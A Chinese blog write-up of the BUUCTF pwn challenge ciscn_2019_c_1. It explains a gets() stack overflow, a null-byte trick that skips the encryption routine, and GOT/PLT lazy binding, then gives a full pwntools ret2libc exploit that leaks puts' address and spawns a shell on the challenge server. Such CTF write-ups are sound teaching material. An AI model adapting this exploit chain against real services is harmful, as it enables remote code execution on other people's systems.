BUUCTF-Pwn-ciscn_2019_c_1

已于 2022-02-14 19:46:22 修改
阅读量3.5k 收藏 4
点赞数 1
分类专栏: CTF Pwn 文章标签: python 其他
于 2022-02-14 19:30:57 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46035101/article/details/122927469
版权
CTF 同时被 2 个专栏收录
29 篇文章 0 订阅
订阅专栏
Pwn
21 篇文章 0 订阅
订阅专栏

题目截图
在这里插入图片描述
检查一下文件信息
在这里插入图片描述
开启了NX,64位的文件
使用IDA打开
按shift+F12查看字符串,没有找到“flag”和“/bin/sh”类似的字符串
一番寻找也没有找到system函数
查看函数导入表找到了puts函数和gets函数,说明使用了libc动态库,可以从这里入手
找到gets函数所在位置查看
在这里插入图片描述
在函数encrypt中使用了gets函数,存在栈溢出,点击encrypt函数的名称,按x检查交叉引用
在这里插入图片描述
双击进入查看调用函数
在这里插入图片描述
运行程序可以了解到,该程序的功能是对字符串进行加密和解密,这段代码的功能就是读取我们的选项并跳转,当我们输入选项1时就会调用encrypt函数,回到encrypt函数,按F5反汇编查看改函数的功能
在这里插入图片描述
该函数的功能就是循环对输入的字符串进行加密,在加密前都有一个检查,只要v0的值大于或等于字符串的长度就跳出循环,而字符串的长度是通过strlen来计算的,strlen计算字符串的长度是以’\0’作为终止符,所以我们只需要在payload的开头加上’\0’就能绕过加密从而保证我们写入的数据不被改变
在没有system及/bin/sh但是有libc动态库的情况下,我们通常有以下思路:
1.获取libc的版本
2.获取libc的基址
3.计算system及/bin/sh的地址
4.构造payload获取shell
获取libc版本和计算system及/bin/sh的地址可以使用工具Libcsearcher,使用该工具的前提是获取到程序运行时libc库中的某一函数的实际地址,这里不得不说到GOT表和PLT表,GOT表用来保存函数在程序运行时的实际地址,PLT表用于延迟绑定,所谓绑定就是获取外部函数的实际地址等信息,延迟绑定即等到第一次用到某函数时才进行绑定,调用外部函数时,程序先查PLT表,如果是第一次调用,PLT表会指向一段代码,这段代码会执行一些函数来获取该外部函数的实际地址,填入到GOT表中,并修改PLT表指向GOT表中的相应位置,下一次调用时就会直接从PLT表转到GOT表获取到实际的地址,所以我们只需要知道目标函数在PLT表和GOT表中的位置,就能获取到表值及目标函数的实际地址
这道题有两次栈溢出
第一次栈溢出调用puts函数打印puts函数的实际地址并回到主函数来进行第二次溢出
第二次溢出获取shell
完整的exp

from pwn import*
from LibcSearcher import*

r=remote('node4.buuoj.cn',27870) 
elf=ELF('/home/lhb/桌面/ciscn_2019_c_1')

#第一次溢出
main=0x400b28 #主函数的地址
#pop_rdi和ret通过工具ROPgadget来获取
pop_rdi=0x400c83 #pop rdi;ret;
ret=0x4006b9 #ret;

puts_plt=elf.plt['puts'] #获取puts在plt表中的位置
puts_got=elf.got['puts'] #获取puts在got表中的位置

r.sendlineafter(b'choice!\n',b'1') #选择选项1
payload=b'\0'+b'a'*(0x50-1+8) #填充
payload+=p64(pop_rdi) #rop链
payload+=p64(puts_got)
payload+=p64(puts_plt)
payload+=p64(main)

r.sendlineafter(b'encrypted\n',payload) #进行栈溢出
r.recvline() #接收字符串“Ciphertext“
r.recvline() #接收加密后的密文
addr=r.recvuntil(b'\n') #接收puts的地址
puts_addr=u64(addr[:-1].ljust(8,b'\0')) #去掉末尾的'\n’并解包,因为需要长度为8字节才能解包,所以用'\0'填充

libc=LibcSearcher('puts',puts_addr) #获取libc的版本
offset=puts_addr-libc.dump('puts') #计算偏移量
binsh=offset+libc.dump('str_bin_sh') #计算字符串"/bin/sh"的地址
system=offset+libc.dump('system') #计算函数system的地址

#第二次溢出
r.sendlineafter(b'choice!\n',b'1') #选择选项1
payload=b'\0'+b'a'*(0x50-1+8) #填充
payload+=p64(ret) #rop链
payload+=p64(pop_rdi)
payload+=p64(binsh)
payload+=p64(system)

r.sendlineafter(b'encrypted\n',payload) #进行栈溢出
r.interactive() #开启交互
餐桌上的猫
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
BUUCTF - PWNciscn_2019_c_1
古月浪子的博客
03-20 4038
checksec一下 IDA打开看看,encrypt函数内存在栈溢出漏洞 由于程序会将输入的内容加密,这会破坏我们的payload,所以注意到strlen函数,通过在payload开头放上 \0 来绕过加密 由于程序内没有后门函数,也没有system函数,所以考虑ret2libc 特别注意到题目是部署在Ubuntu18上的,因此调用system需要栈对齐,这里填充ret来对齐 from pwn...
buuctf pwn ciscn_2019_c_1
qq_58402603的博客
10-20 550
首先基本操作: 先对文件进行checksec和file查看 然后使用ida进行静态分析,找到main函数后按F5观察伪代码 发现是一个加密程序 然后按shift+F12进行字符串的查找,发现没有 /bin/sh字符串,因此我们只能利用libcsearch库中的system函数来完成此题,可以对puts函数进行地址泄露。 对主函数中调用的函数进行查看,可以发现encrypt函数中有gets()函数,可以在这里进行栈溢出攻击 双击s查看字符串s所分配的内存大小可以发现,一共占50...
Buuctf(PWN)ciscn_2019_c_1
半岛铁盒的博客
03-22 1260
一个普通的小程序,给了3个选项来供我们选择; 在main函数进行分析,发现输入 1 是正确的通道; 点进去下面的encrypt() 加密函数; 在这里发现了 gets()溢出函数; 我们可以利用这个函数漏洞来构建我们的payload; 紧接着下面 就会对 我们输入的payload 进行加密操作会破坏我们的payload; 我们需要避免这种情况; 看第14行有个 if ( v0 >= strlen(s) ); 当不满足条件时会退出 while 循环; 我们要借此利用这个 if ..
[BUUCTF-pwn]——ciscn_2019_c_1
Y_peak的博客
02-07 1171
[BUUCTF-pwn]——ciscn_2019_c_1 题目地址:https://buuoj.cn/challenges#ciscn_2019_c_1 题目: 下载下来checksec一下 再IDA上面看一下,利用shift + f12看下字符串,发现没有我们想要的字符串。以为是ret2shellcode,结果弄了半天不可以。重新看一遍发现开启了NX保护,原来是ret2libc类型的,呜呜呜。 ...
BUUCTF-PWNciscn_2019_c_1
qcwwww的博客
05-07 412
这里写自定义目录标题欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 欢迎使用Markdown编辑器 checksec一下 新的改变 我们对Markdown编辑器进行了一些功能拓展与语法支持,除
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
ciscn_2019_n_3
12-30
ciscn(全国大学生信息安全竞赛),2019年的一道题目,涉及到fastbin堆漏洞的利用。由于调用了system函数,所以漏洞利用的难度不大,推荐初学者练习。题解链接:...
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
ciscn-2019-pwn
11-29
1. baby_pwn2. bms3. daily4. Double5 your_pwn
your_pwn ciscn 2019 第十二届全国大学生信息安全竞赛
04-22
pwn赛题之your_pwn ciscn 2019 第十二届全国大学生信息安全竞赛
[BUUCTF]PWN6——ciscn_2019_c_1
mcmuyanga的博客
08-25 6707
[BUUCTF]PWN6——ciscn_2019_c_1 题目网址:https://buuoj.cn/challenges#ciscn_2019_c_1 步骤: 例行检查,64位,开启了nx保护 nc一下,看看输入点的字符串,三个选项加密、解密、退出 用64位ida打开,先是shift+f12查看一下程序里的字符串 没有发现system函数和字符串“bin/sh”,先根据输入点的字符串查看一下主要函数 就像一开始说的程序的功能就是加密和解密,看伪代码可以知道,只有选1的时候才会调用encrypt()
buuctf PWN ciscn_2019_c_1
最新发布
wp568的博客
10-08 203
amd64的参数调用顺序是如下序列的自后而前,即:完成传递参数(地址)->本函数地址 -> 返回地址。encrypt()里面的get()可以溢出,栈大小为50h。puts()可以用来泄露libc基址。
PWN|ciscn_2019_c_1
l2645470582_的博客
02-28 397
1.检查保护机制 (1)开启堆栈保护 (2)64位文件 2.用64位IDA打开该文件 (1)shift+f12查看关键字符串 没有看到后面函数(system等) (2)进入mian函数 int __cdecl main(int argc, const char **argv, const char **envp) { int v4; // [rsp+Ch] [rbp-4h] BYREF init(argc, argv, envp); puts("EEEEEE...
BUUCTF ciscn_2019_c_1
、moddemod
06-01 1257
跑一下程序,大致流程是 到现在程序就基本分析完成,接下来需要构造rop泄露libc地址然后利用system等函数获得shell 我们首先要获得libc的基地址,可以通过puts函数入手,这里解释一下为什么通过puts函数而不通过其他函数,因为puts函数在我们进入encrypt函数之前已经调用了很多次了,对于每一个动态链接而言,第一次调用完成以后,就修正了.got表中的对应的puts函数的地址,所以我们可以通过puts函数泄露。 from pwn import * from LibcSearc.
Pwn_buuctf_ciscn_2019_c_1
Trick的博客
11-20 428
libc64 ida查看 在main函数没有发现明显漏洞 跟进encrypt()函数 发现了gets()和puts()函数,可以利用gets的栈溢出泄漏出puts的地址,从而找到libc版本信息getshell exp: from pwn import * from LibcSearcher import * p= remote('node3.buuoj.cn',25412) #p= remote('127.0.0.1',12345) #p = process('./ciscn_2019_c_1') #
日行一PWNciscn_2019_c_1不给出libc题型
m0_57221101的博客
06-02 759
BUUCTF ciscn 依旧使用buu提供的题这次大体和上次babyrop一样,都是使用源程序中不存在的函数来进行攻击,区别在于此次没有给出libc的版本,我们需要自己暴漏libc的版本以及本次的64位程序,在传参上和32位程序的一些不同闲话少叙,后面需要的知识点我们后面再学,我们便分析边聊checksec分析64位的程序,只有数据段免执行保护。地址为0000000000400B28我们可以通过telnet连接一下看看她在干什么可以看到是一个简单的输入判断
BUUCTF ciscn_2019_c_1(rop_x64,泄露libc)
菜的只能随便写写博客
11-26 5845
由于Ubuntu18的环境很迷,这个题目只在kali上用本地libc完成过,脚本也是kali环境的 0x1 检查文件 64位elf 无canary 无PIE   0x02 流程分析 根据运行的流程,这个程序主要有两个功能,加密功能可以使用,但解密功能没办法使用,并且能够输入的地方就两个,一个选择程序,数字输入,第二个输入加密文本,字符串类型,之后的静态分析主要关注这两个地方。   0x02...
buuctf [HarekazeCTF2019]baby_rop2
09-30
[BUUCTF-pwn]——[HarekazeCTF2019]baby_rop2是一个pwn题目。在这个题目中,主要的目标是获取read函数的地址,并利用该地址泄漏libc基址,然后计算system函数和/bin/sh字符串的地址,最终执行system('/bin/sh')获取...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值